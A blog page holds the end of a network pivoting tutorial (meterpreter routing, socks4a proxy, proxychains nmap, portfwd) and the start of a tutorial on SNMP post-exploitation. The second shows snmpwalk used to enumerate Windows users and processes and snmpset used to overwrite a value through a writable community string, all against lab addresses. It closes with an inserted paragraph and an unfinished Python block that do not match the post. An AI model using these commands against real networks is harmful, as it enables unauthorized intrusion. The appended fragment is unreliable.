<a name='more'></a></div>
<div>
<br /></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="font-size: 17px;"><b>1) Compromise primary target machine (System A)</b></span></span></div>
</div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="font-size: 17px;"><b><br /></b></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHt7VxcZ1Um-_6qkeiwhaN8SnVyq9ghyphenhyphenwnmSjJkaHdF3ekbTIMHyzDeVWARZPZ6KwuLriryq04_qIMiUKoZPY8cPF5Uu_RdLEG8pJwK9q3HP32ol3NgdopxoZ2mDyU8IZdlck44Hbd1sg/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHt7VxcZ1Um-_6qkeiwhaN8SnVyq9ghyphenhyphenwnmSjJkaHdF3ekbTIMHyzDeVWARZPZ6KwuLriryq04_qIMiUKoZPY8cPF5Uu_RdLEG8pJwK9q3HP32ol3NgdopxoZ2mDyU8IZdlck44Hbd1sg/s640/1.png" width="640" /></a></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="font-size: 17px;"><b><br /></b></span></span></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="font-size: 17px;"><b><br /></b></span></span></div>
<div>
<b><span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="font-size: 17px;">2) </span></span><span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;">Search for System network interfaces</span></b></div>
<div>
<b><span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><br /></span></b></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;">Looking at the screenshot below, we can see that the machine we exploited (192.168.31.X) has another network interface in the 10.1.1.0/24 range.</span></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijTkKtCp0hU0d9gHUWPsGGUxm4euzhKp0J44EjaeGWTMYNngjT5NZFMCjPQur8d1Hgp4LHJFnsaPP5RFZw8ZhiSTqK1-SAKmIRBIreJiRDQQLec0weaEG3Vk1WPZ5DlpduKUeJnAzs1hA/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijTkKtCp0hU0d9gHUWPsGGUxm4euzhKp0J44EjaeGWTMYNngjT5NZFMCjPQur8d1Hgp4LHJFnsaPP5RFZw8ZhiSTqK1-SAKmIRBIreJiRDQQLec0weaEG3Vk1WPZ5DlpduKUeJnAzs1hA/s640/1.png" width="640" /></a></div>
<div>
<b><span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><br /></span></b></div>
<div>
<b><span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><br /></span></b></div>
<div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;">To check which hosts in this range are reachable from Machine A, we need to run the ARP scanner.</span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><br /></span></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;">run arp_scanner -r IP address range</span></div>
</div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;"><br /></span></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;">In this scan output, we found several machines and we have chosen one of them. </span></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;"><br /></span></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXWYseKp04CRUq_v1PmC2risG8Ok-9_O1pZntfX4L-rRK1L1q6InEsDPLFRtMKaS3cpZLjVSjYi10dtY9cVLUupN8AaW0zrGODZ2h2bmShaW2tDvJ4UpC5CFbOJRSgZGGYBeeTpLwM9AM/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="388" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXWYseKp04CRUq_v1PmC2risG8Ok-9_O1pZntfX4L-rRK1L1q6InEsDPLFRtMKaS3cpZLjVSjYi10dtY9cVLUupN8AaW0zrGODZ2h2bmShaW2tDvJ4UpC5CFbOJRSgZGGYBeeTpLwM9AM/s640/1.png" width="640" /></a></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;"><br /></span></div>
<div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;">In meterpreter, type "background". This will background our meterpreter shell and allow us to perform further actions.</span></span></div>
</div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;"><br /></span></span></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;">Now we need to add a route to System B (10.1.1.0/24) through our meterpreter session. </span></span></div>
<div>
<br /></div>
<div>
<b><span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><br /></span></b></div>
<div>
<b><span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;">3) </span></b><span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><b>Add route to metasploit session of System A</b></span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><b><br /></b></span></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;">route add (ip_address) (subnet mask) (session_number)</span></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;">route add 10.1.1.0 255.255.255.0 1</span></div>
<div>
<br /></div>
<div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0znKo2zh_c_UJB4ZEq_MCjHm7dgXHmIxRn7aorrX_j3P-8ts8YzndL2A-e9bWA1gzIQTYyeKuBYK-xxL5-puqV5TfnapvZJpfCpF66tTeoAHqny_Hfxa9nUBBRKYn_lth7R6fbnnxEkQ/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="108" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0znKo2zh_c_UJB4ZEq_MCjHm7dgXHmIxRn7aorrX_j3P-8ts8YzndL2A-e9bWA1gzIQTYyeKuBYK-xxL5-puqV5TfnapvZJpfCpF66tTeoAHqny_Hfxa9nUBBRKYn_lth7R6fbnnxEkQ/s640/1.png" width="640" /></a></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><b><br /></b></span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><b><br /></b></span></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;">Now our meterpreter session can communicate with any of the machines in the 10.1.1.X range.</span></span></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;"><br /></span></span></div>
<div>
<span style="background-color: white; font-weight: 700;">4) </span><span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700;">Run Proxy server</span></div>
<div>
<br /></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;">The proxy server creates a tunnel which allows Metasploit and other tools to interact with System B (10.1.1.X) via the meterpreter shell.</span></span></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;"><br /></span></span></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;">use auxiliary/server/socks4a</span></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMV3Zj1FX8VRZkq-HZoKxxXchc3Rj4djAj1XHc8BqkhYOUwrNtnOdfDLSyjpEnoCxEbUktkT5UfxfzXJ-HHoyivN6vV2dV_ny5RhTJPusVG4UKz2YE523qCmiwU545M2LP7bafLVvZDAw/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMV3Zj1FX8VRZkq-HZoKxxXchc3Rj4djAj1XHc8BqkhYOUwrNtnOdfDLSyjpEnoCxEbUktkT5UfxfzXJ-HHoyivN6vV2dV_ny5RhTJPusVG4UKz2YE523qCmiwU545M2LP7bafLVvZDAw/s640/1.png" width="640" /></a></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;"><br /></span></span></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;"><b>5) </b></span></span><span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700;">Scan the Secondary target machine (System B)</span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700;"><br /></span></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;"><b>Nmap comes in handy for port scanning; we can use the command below to perform a port scan.</b></span></span></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;"><b><br /></b></span></span></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;">proxychains nmap -sTV -p(port range) -n -PN (ip address of system B)</span></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv4XVlR_kAy9axfv3GgK5Nm5QGLW3bQ4eQP9PKUGFlyWkMOLXa3tguoftg23UCvNfnXhyphenhyphena7YdEvnqELM8edwiBLhF3qtVCJZvvInSMHdDy97ybalYRghVzpA5eDKO6947NWH1uh2GHIQQ/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="572" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv4XVlR_kAy9axfv3GgK5Nm5QGLW3bQ4eQP9PKUGFlyWkMOLXa3tguoftg23UCvNfnXhyphenhyphena7YdEvnqELM8edwiBLhF3qtVCJZvvInSMHdDy97ybalYRghVzpA5eDKO6947NWH1uh2GHIQQ/s640/1.png" width="640" /></a></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY5SNeGn7zo6x6IN5qjBFsJU-LMEMIvM_xDQw_o9g4N32M6zsD55811s95J-tBEL0LTCGzvRqSGMpzCGIi0GUFa8vhwK_kBqaM16VckTZiN_bi81Esx5McrNYymcw2xIeHoVvXdnzJU6M/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY5SNeGn7zo6x6IN5qjBFsJU-LMEMIvM_xDQw_o9g4N32M6zsD55811s95J-tBEL0LTCGzvRqSGMpzCGIi0GUFa8vhwK_kBqaM16VckTZiN_bi81Esx5McrNYymcw2xIeHoVvXdnzJU6M/s640/1.png" width="640" /></a></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;"><br /></span></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;"><br /></span></span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;">In the output below, "Ok" indicates an open port and "Denied" indicates a closed one.</span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;">Ex. port 4001 is open.</span></div>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;"></span><br />
<div style="font-weight: 700;">
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;"><span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="font-size: 17px;"><br /></span></span></span></div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;">
</span>
<br />
<div style="font-weight: 700;">
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;"><span style="font-weight: normal;">Now interact with your backgrounded session in Metasploit using the session interaction command.</span></span></div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;">
</span>
<br />
<div style="font-weight: 700;">
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;"><span style="font-weight: normal;"><br /></span></span></div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;">
</span>
<br />
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;"><b>sessions -i (session number)</b></span></div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;">
</span>
<div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;"><b><br /></b></span></div>
<span style="background-color: white; border: 0px; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px; margin: 0px; outline: 0px; padding: 0px;">
<div>
<b>6) </b><span style="font-weight: 700;">Port forwarding</span></div>
<div>
<span style="font-weight: 700;"><br /></span></div>
<div>
<span style="border: 0px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;">Command</span> : <span style="border: 0px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;">portfwd add -l (your system port) -p (target system port) -r (target system ip address)</span></div>
<div>
<span style="border: 0px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkQ_RYt7BLuZR7EbDkIYN39w6YqEXdDvaT3zlBujEieQQQo57GWXXJbFAocaIhlcJNLeO2qc_vILhycuy5fDdJUqc0CRI2hpzkoSrRW3nptvKQuDDSKPDWhwgKjZaOJI2157Jr2NGg8VM/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="284" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkQ_RYt7BLuZR7EbDkIYN39w6YqEXdDvaT3zlBujEieQQQo57GWXXJbFAocaIhlcJNLeO2qc_vILhycuy5fDdJUqc0CRI2hpzkoSrRW3nptvKQuDDSKPDWhwgKjZaOJI2157Jr2NGg8VM/s640/1.png" width="640" /></a></div>
<div>
<span style="border: 0px; font-weight: 700; margin: 0px; outline: 0px; padding: 0px;"><br /></span></div>
<div>
Now we can access the web application on System C port 4001 through our localhost IP.</div>
<div>
<b><br /></b></div>
<div>
<b><br /></b></div>
</span></div>
<br /></div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-22281710863594246942017-04-10T00:23:00.001+05:302017-04-11T16:37:22.220+05:30Hacking SNMP Service Part 2 - The Post Exploitation : Attacking Network - Network Pentesting<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4faJH4HPssPfJiG9vSDERsFxCt-zCIizxckjGdJA0E58xD7Dcb89gfiiv-sJPQmgGhDzQvhk2qsGm97iWgfRDvDJ3tQb7YeJa4BkO3Lu3r9Z_u49fWeBB-ZQjgUshz3FxRAr6qQuxoGI/s1600/Screen+Shot+2017-04-09+at+10.51.11+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4faJH4HPssPfJiG9vSDERsFxCt-zCIizxckjGdJA0E58xD7Dcb89gfiiv-sJPQmgGhDzQvhk2qsGm97iWgfRDvDJ3tQb7YeJa4BkO3Lu3r9Z_u49fWeBB-ZQjgUshz3FxRAr6qQuxoGI/s640/Screen+Shot+2017-04-09+at+10.51.11+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h2 style="clear: both; text-align: center;">
Hacking SNMP Service Part 2 - The Post Exploitation : Attacking Network - Network Pentesting</h2>
<div>
In our previous <a href="http://www.websecgeeks.com/2017/04/hacking-snmp-service-part-1-post.html" target="_blank">post</a>, we identified the community strings via an Nmap scan and by brute forcing the community string values.<br />
<br />
Now we will see how those extracted community strings can be used for post exploitation.<br />
<br />
To do this we will use the tools described below.<br />
<br />
<div class="separator" style="clear: both;">
<b>What Is MIB in SNMP</b></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
The SNMP Management Information Base (MIB) is a database containing information usually related to network management. The database is organized like a tree, where branches represent different organizations or network functions. The leaves of the tree (final endpoints) correspond to specific variable values that can then be accessed, and probed, by an external user. To read more about the MIB tree, refer to the following:</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<a href="http://publib.boulder.ibm.com/infocenter/pseries/v5r3/index.jsp?topic=/com.ibm.aix.progcomm/doc/progcomc/mib.htm">http://publib.boulder.ibm.com/infocenter/pseries/v5r3/index.jsp?topic=/com.ibm.aix.progcomm/doc/progcomc/mib.htm</a></div>
<div>
<br /></div>
<div>
<div>
For example, the following MIB values correspond to specific Microsoft Windows SNMP parameters.</div>
<div>
1.3.6.1.2.1.25.1.6.0 <b>System Processes</b></div>
<div>
1.3.6.1.2.1.25.4.2.1.2 <b>Running Programs</b></div>
<div>
1.3.6.1.2.1.25.4.2.1.4 <b>Processes Path</b></div>
<div>
1.3.6.1.2.1.25.2.3.1.4 <b>Storage Units</b></div>
<div>
1.3.6.1.2.1.25.6.3.1.2 <b>Software Name</b></div>
<div>
1.3.6.1.4.1.77.1.2.25 <b>User Accounts</b></div>
<div>
1.3.6.1.2.1.6.13.1.3 <b>TCP LocalPorts</b><br />
<b><br /></b>
<b></b><br />
<a name='more'></a><br /></div>
</div>
<div>
<b>A) SNMPWALK</b><br />
We already have our community string, "mike". Now we pass it to snmpwalk followed by our target IP, which will extract all the information the SNMP service exposes.</div>
<div>
<b><br /></b></div>
<br />
<br />
<b>snmpwalk -v1 -c mike 192.168.131.135</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsMfqln4XXWVNW9wMLcSd_GqCiwx50X7rO4rPn4lDaQEkj8iFCCkDrI5m_UsKu8NqQhRX3SHLe-qKtP0wYRv5TjjtZdGLSLZx1habAZJZfktG2cvAsW10IcqXnfNRrAmAc6VEDo9AlzBo/s1600/Screen+Shot+2017-04-09+at+10.56.51+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="304" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsMfqln4XXWVNW9wMLcSd_GqCiwx50X7rO4rPn4lDaQEkj8iFCCkDrI5m_UsKu8NqQhRX3SHLe-qKtP0wYRv5TjjtZdGLSLZx1habAZJZfktG2cvAsW10IcqXnfNRrAmAc6VEDo9AlzBo/s640/Screen+Shot+2017-04-09+at+10.56.51+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The output is very large, so I am redirecting it to a text file.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<b>snmpwalk -v1 -c mike 192.168.131.135 > snmpout.txt</b></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoTMuOF6X3oGgOB_Pm5NbXVo28axfKmK_AS0LWv-Ap19H2flPrBdSns4i3kJtOd5gGUYlmWbZcPwZOPko3sM3czdwRqWgDTgbZvteSXSHz41pRBxAzm7lB-MUxnZp06-_oqJlcP2ZxFak/s1600/Screen+Shot+2017-04-09+at+11.03.57+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="54" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoTMuOF6X3oGgOB_Pm5NbXVo28axfKmK_AS0LWv-Ap19H2flPrBdSns4i3kJtOd5gGUYlmWbZcPwZOPko3sM3czdwRqWgDTgbZvteSXSHz41pRBxAzm7lB-MUxnZp06-_oqJlcP2ZxFak/s640/Screen+Shot+2017-04-09+at+11.03.57+PM.png" width="640" /></a></div>
<div>
<br /></div>
<div style="text-align: center;">
<b><br /></b></div>
As you can see below, we have tons of output, with many MIB values.<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfCoRY9vSjEnNOnQm6JcqHxevNaPegL6J8x-P-umphjidI9GG9QtpbsudljySZRwxBi7hOHpRBuVJx6pwxL-XPkoEFp23HUexGt5VPH574Ch7F0Pe9QL5DbZx53qnEWv5-DfXwFPBxKBM/s1600/Screen+Shot+2017-04-09+at+11.12.49+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfCoRY9vSjEnNOnQm6JcqHxevNaPegL6J8x-P-umphjidI9GG9QtpbsudljySZRwxBi7hOHpRBuVJx6pwxL-XPkoEFp23HUexGt5VPH574Ch7F0Pe9QL5DbZx53qnEWv5-DfXwFPBxKBM/s640/Screen+Shot+2017-04-09+at+11.12.49+PM.png" width="640" /></a></div>
<br />
To search for something specific, we can pass a MIB value (an OID) to snmpwalk.<br />
<br />
snmpwalk -c <Communitystring> -v1 192.168.11.204 <MIBValues><br />
<br />
<b>In our case the community string is mike</b><br />
<br />
<b>Extracting Windows Users:</b><br />
<br />
snmpwalk -c mike -v1 192.168.131.135 1.3.6.1.4.1.77.1.2.25<br />
<br />
<b>Extracting </b><b>Running Windows Processes:</b><br />
<b><br /></b>
snmpwalk -c mike -v1 192.168.131.135 1.3.6.1.2.1.25.4.2.1.2<br />
<b><br /></b>
<b>Extracting </b><b>Open TCP Ports:</b><br />
<b><br /></b>
snmpwalk -c mike -v1 192.168.131.135 1.3.6.1.2.1.6.13.1.3<br />
<b><br /></b>
<b>Extracting </b><b>Installed Software:</b><br />
<b><br /></b>
snmpwalk -c mike -v1 192.168.131.135 1.3.6.1.2.1.25.6.3.1.2<br />
<br />
<br />
<b><br />
Now we need to verify whether this community string "mike" is writable or not. To do this we will use another tool, snmpset.</b><br />
<br />
<b>snmpset -v1 -c mike 192.168.131.135 iso.3.6.1.2.1.1.5.0 s SomeOneWasHere</b></div>
<div>
<br /></div>
<div>
Here the OID "<b>iso.3.6.1.2.1.1.5.0</b>" (the system name), which currently has the value "bhati", is picked from our snmpwalk output file.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpxQ82cxz2qaO2RgEMONtYF8p6a3zFMeBOMSTpvD093q4pwlAzzb1zgkWTcPwVeOxT17hCRFjikR2eNA3EZNUpvssh2sCF4ScFNQRasgceFtfyqdt3VZYzLAQpmrW2t_FCdrfxPolyGoE/s1600/Screen+Shot+2017-04-09+at+11.12.49+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpxQ82cxz2qaO2RgEMONtYF8p6a3zFMeBOMSTpvD093q4pwlAzzb1zgkWTcPwVeOxT17hCRFjikR2eNA3EZNUpvssh2sCF4ScFNQRasgceFtfyqdt3VZYzLAQpmrW2t_FCdrfxPolyGoE/s640/Screen+Shot+2017-04-09+at+11.12.49+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This <b>snmpset -v1 -c mike 192.168.131.135 iso.3.6.1.2.1.1.5.0 s SomeOneWasHere </b>command will change the value from "bhati" to "SomeOneWasHere" on the target. Let's try it.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Our command succeeded.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcHdHGv3692CJSQHlaRwER3UjB6nqY4zy26RUOXYrkHr-reL3PvRa8DYwqWyBy7qA0HcpvtbIR7iUwCkAUFQ97zhG5N0BZn4MQpUSjj39v2EbCt8TNUJsTGN7Y9ZIxRWLS39nTsQt-B7k/s1600/Screen+Shot+2017-04-09+at+11.18.28+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="68" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcHdHGv3692CJSQHlaRwER3UjB6nqY4zy26RUOXYrkHr-reL3PvRa8DYwqWyBy7qA0HcpvtbIR7iUwCkAUFQ97zhG5N0BZn4MQpUSjj39v2EbCt8TNUJsTGN7Y9ZIxRWLS39nTsQt-B7k/s640/Screen+Shot+2017-04-09+at+11.18.28+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Now let's re-scan our SNMP target using snmpwalk.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
As you can see below, the value has been changed to "SomeOneWasHere".</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJqC7VPyP0NPxn1Nt5j5RgX2W_pXjRGje1KireqYu3uuGg8evzebY9Wgjj-Gb9L4CkhoYh7vhNbgLron8UONxQqKASvVnT6kkPkMNXsi58Zf62FImc04G4ui665jFDQizePCkFbTOiY7o/s1600/Screen+Shot+2017-04-09+at+11.19.39+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="304" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJqC7VPyP0NPxn1Nt5j5RgX2W_pXjRGje1KireqYu3uuGg8evzebY9Wgjj-Gb9L4CkhoYh7vhNbgLron8UONxQqKASvVnT6kkPkMNXsi58Zf62FImc04G4ui665jFDQizePCkFbTOiY7o/s640/Screen+Shot+2017-04-09+at+11.19.39+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Now we have confirmed that our community string "mike" has write access. Next we move on to dumping more information from the target machine.</div>
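The post enumerates each Windows subtree by re-running snmpwalk per OID, and confirms the write by re-walking the target and reading the change off the screen. As an added example (not code from the original post), the following Python does both offline: it parses a saved snmpwalk dump such as snmpout.txt, pulls out the subtrees from the OID table above, and diffs two captures so a modified value like the rewritten system name shows up on its own, which is also how a defender would baseline a device and spot unauthorized SNMP SETs. The walk output, host values and the VOLATILE_PREFIXES list are constructed for this example; net-snmp's MIB-less "iso.3.6.1..." output format is assumed.

```python
import re
from typing import Dict, List, Tuple

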